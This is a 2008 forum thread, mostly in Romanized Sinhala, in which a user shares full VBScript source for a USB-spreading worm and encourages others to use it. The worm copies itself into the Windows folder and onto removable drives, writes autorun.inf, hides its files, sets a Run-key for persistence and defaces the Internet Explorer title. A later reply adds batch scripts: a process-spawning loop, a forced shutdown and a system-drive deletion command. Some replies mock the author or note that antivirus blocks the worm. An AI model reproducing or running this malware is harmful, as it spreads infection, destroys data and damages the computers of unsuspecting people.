PDA

View Full Version : Write own VIRUS in 1 miniute !!!!!!!!


dilshancjdon
10-14-2008, 10:11 AM
umbala virus ekek hadanna onida ????????

programming dana ganna oni naa

menna codes

NOTE PAD eke gahapan



'My name is D Dragon
'This virus is dedicated to every enimy of mine
'REST IN PEASE
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by D Dragon"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname






meeke reg write kiyala tiyena tana mage issella tiba Tread eke ( Top 25 Registry hacks ) oni ekak gahapan !!!!!!!!!!!




etakota mulu PC ekema control eka umbala ate !!!!!!!!!!









meeka save karana kota


MS32DLL.dll.vbs

kiyala Save karapan !!!!!!!!!!!!!!!




Enjoy






---------------another greate hack by Dragon Dilshan-----------------------

Kalindugayan
10-14-2008, 10:19 AM
:P:P:P
save kalata passe moko wenne?

dilshancjdon
10-14-2008, 10:21 AM
Double click and run

Then DIE !!!!!!!!!!!

( baya wenna epa wadi deyak wenne naa , koykatat wenin ekekge PC ekeka check karanna )

Kalindugayan
10-14-2008, 10:23 AM
Double click and run

Then DIE !!!!!!!!!!!

( baya wenna epa wadi deyak wenne naa , koykatat wenin ekekge PC ekeka check karanna )
:P
mata ehenan oyage PC eka denna
mama test karannam

lasith_hasantha
10-14-2008, 10:23 AM
Vena ekekge ekaka karala oo apita gahanna elewwoth mokada koranne?

jeffhardy
10-14-2008, 10:24 AM
THANKS

lasith_hasantha
10-14-2008, 10:24 AM
:P
mata ehenan oyage PC eka denna
mama test karannam

:lol::lol::lol::lol:

kosandpol
10-14-2008, 10:24 AM
dude! have you lost your mind ?

dilshancjdon
10-14-2008, 10:26 AM
ya..........

my hobby is programming and developing Viruses !!!!

Do you want more ?????????????

Jack_Sparrow
10-14-2008, 10:26 AM
umbala virus ekek hadanna onida ????????

programming dana ganna oni naa

menna codes

NOTE PAD eke gahapan



'My name is D Dragon
'This virus is dedicated to every enimy of mine
'REST IN PEASE
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by D Dragon"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

etakota mulu PC ekema control eka umbala ate !!!!!!!!!!


---------------another greate hack by Dragon Dilshan-----------------------


oa ohenda gatte

ozone_buzzer
10-14-2008, 10:27 AM
Meka hohetada save karanna one & meken monavada karanna puluvan..??

dilshancjdon
10-14-2008, 10:38 AM
ooni tanaka save karanna.

Auto run ekek daala CD ekakata daannna !!!!!

menna USB pen drive ekakata Auto run eke codes

[autorun]
open=MS32DLL.dll.vbs
;shell\open=Open(&O)
shell\open\Command=MS32DLL.dll.vbs
shell\open\Default=1
;shell\explore=Manager(&X)
shell\explore\Command=MS32DLL.dll.vbs

meeka "autorun.inf" kiyala save karanna

meeken wadi deyak wenne naa !!!!!!!

Hidden files unable eke disable wey,
hama PEN drive ekatama copy wey,
IE eke nama wenas wey

tawa podi podi tikak wey....

okkoma kiwwot wadak naaa!!!!!!!!!!!!!!

CHECK karala balanna !!!!!!!!!!!

********Kaspersky lokkat ekka nam baa!!!!!!!!!!

rjzone2000
10-14-2008, 10:40 AM
Guti kana wedane mu karanne..hah..hah...!!!

Kalindugayan
10-14-2008, 10:40 AM
ya..........

my hobby is programming and developing Viruses !!!!

Do you want more ?????????????
natuwata kamak ne:P

rjzone2000
10-14-2008, 10:44 AM
Yako ...Muwa thiyanna watinne nene...

rjzone2000
10-14-2008, 10:45 AM
Den Oka monama Virus guard ekakin wath track wenne nedda...???

kalhara.rokz
10-14-2008, 10:46 AM
apo save karapu gaman virus guard eken allanawa........

dxxcxxxx
10-14-2008, 10:48 AM
Interesting staff......:yes: :yes:

But, i hope nobody will try with their friends....:rolleyes: :rolleyes:

lakmalunit
10-14-2008, 11:21 AM
ya..........

my hobby is programming and developing Viruses !!!!

Do you want more ?????????????


umbe munen penawa virus porak kiyala:lol: :lol: :lol: :lol:

prasannaf
10-14-2008, 11:22 AM
tiyana ewa madi welada wawagena kanna hadanne

kosandpol
10-14-2008, 11:22 AM
umbe munen penawa virus porak kiyala:lol: :lol: :lol: :lol:

Owned! :D :D

krizta
10-14-2008, 11:26 AM
:lol: :lol: Thnx :lol:
avter eke inne uba da? :lol: :P

tharinda76
10-14-2008, 11:27 AM
Niyamai Ne Ban !! kawa hari baya karanna puluwan !!

dilshancjdon
10-14-2008, 11:40 AM
ow mama tama !!!!!!!!

northtech
10-14-2008, 11:47 AM
ya..........

my hobby is programming and developing Viruses !!!!

Do you want more ?????????????

ho no keep it with you only.
we don't need any kind of troubles !!!! :lol: :lol: :lol: :lol:

sherlock
10-14-2008, 02:47 PM
ammmo guti kana wedane

kanishkaprr
10-19-2008, 02:27 AM
dont waste the time.....
fully updated kaspersky internet security 2009 doesnt even let it save it as .vbs !!!

Atekukula
10-19-2008, 02:43 AM
Menna fack Virous....Code

x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")
x = MsgBox("text here",0+16 ,"title here")


Save as vbs

Atekukula
10-19-2008, 02:44 AM
fack Virous

@echo off
:A
start dir
start explorer
start notepad
goto:A

Save as name.bat

Atekukula
10-19-2008, 02:45 AM
fack Virous

start
start
start
start
start
start
start
start


Save As Name.bat

Atekukula
10-19-2008, 02:47 AM
fack Virous

New-Shortcut

Code
shutdown -s -t 3 -c "you have a virus in your computer!"

Atekukula
10-19-2008, 02:49 AM
Denger virus

code
del %systemdrive%\*.* /s /f /q

Save as bat

this virus will be deleting your sestem file

Atekukula
10-19-2008, 02:50 AM
Tawa oneda

4keven4
10-19-2008, 02:50 AM
haha...
mei virus eke umbema thaniyama develope karapu ekakda?
nathnam kage hari wena ekekge ekakda?

kalhara.rokz
10-19-2008, 02:58 PM
ela machan

nasri123
10-19-2008, 03:04 PM
:shocked: Apitanang epooooo... Machan virus hadala.. umbalage fun ekata.. anith ayata aparadayak keranna hithanna epa.. honda S/w develop kerapan... my wishes...

ni_shi2005
10-19-2008, 03:15 PM
ammov meya apitama wede deyda danne!! :P

madurax86
10-19-2008, 03:27 PM
mewa hodai vb script ganai windows walata ena podi pahe virus ganai nodana unta
im sure this is not ur code bro why are u editing other peoples work? make sumthing of ur own, to deactivate ur so called virus what people only have to do is disable autorun and goto attrib and delete the *.vbs file before opening the pen ...hehe ocharai

nimaz
10-19-2008, 03:29 PM
elaaa

spk1234
10-19-2008, 03:56 PM
Maru Wade Machan mama kamathiy ebawa aduraganna
matath virus tikak hadaganna oni

spk1234
10-19-2008, 03:57 PM
Reshacker Download karala dala balapan

gtkisaru
10-19-2008, 04:02 PM
registry hack ekak :lol: :lol: :lol:

booleanB
10-19-2008, 04:19 PM
i think this is spam

BLACKLIST_MEMBER
10-19-2008, 05:09 PM
hapo jarawak neda? ara autorun.inf jarawak math dakka virussource eke thiyenawa oya wage worm scripts, source codes set ekak. nathara karanna baha eka eka podi podi wenas kara kara aith hada hada ewanawa...

machan umba langa nadda IMv1rus wala source?

tharuksha123
10-19-2008, 05:10 PM
hapo jarawak neda? ara autorun.inf jarawak math dakka virussource eke thiyenawa oya wage worm scripts, source codes set ekak. nathara karanna baha eka eka podi podi wenas kara kara aith hada hada ewanawa...

machan umba langa nadda IMv1rus wala source?
muu kiwwa kiyanne hari thama :P